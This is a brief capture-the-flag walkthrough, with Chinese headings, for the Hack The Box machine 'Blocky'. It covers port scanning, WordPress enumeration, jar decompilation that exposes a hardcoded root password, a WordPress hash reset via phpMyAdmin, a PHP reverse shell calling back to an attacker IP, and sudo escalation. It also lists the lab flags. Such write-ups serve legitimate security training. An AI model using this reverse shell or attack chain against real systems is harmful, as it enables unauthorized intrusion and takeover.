信息收集

IP Address	Opening Ports
10.10.10.37	TCP:21,22,80,25565

$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

HTTPD

# echo '10.10.10.37 blocky.htb'>>/etc/hosts

$ wpscan --url http://blocky.htb/ --enumerate u

username:notch

$ dirb http://blocky.htb

http://blocky.htb/plugins/

http://blocky.htb/phpmyadmin/

Jar包反编译

$ wget http://blocky.htb/plugins/files/BlockyCore.jar

$ binwalk BlockyCore.jar

$ foremost BlockyCore.jar

$ cd ./output/zip

$ unzip 00000000.zip

$ cd ./com/myfirstplugin

$ javap -c BlockyCore.class

username:root password:8YsqfCTnvxAUeduzjNSXe22

www-data 权限

phpAdmin登录,更新notch密码

https://www.useotools.com/ru/wordpress-password-hash-generator

$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/

$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);

$ curl http://blocky.htb/

$ su notch

Password: 8YsqfCTnvxAUeduzjNSXe22

User.txt

23da8f7548a2c1df972caa7fc6ca3b9d

权限提升

$ sudo -l

$ sudo /bin/bash

Root.txt

8e66e7402571816ee90419d1a6eca642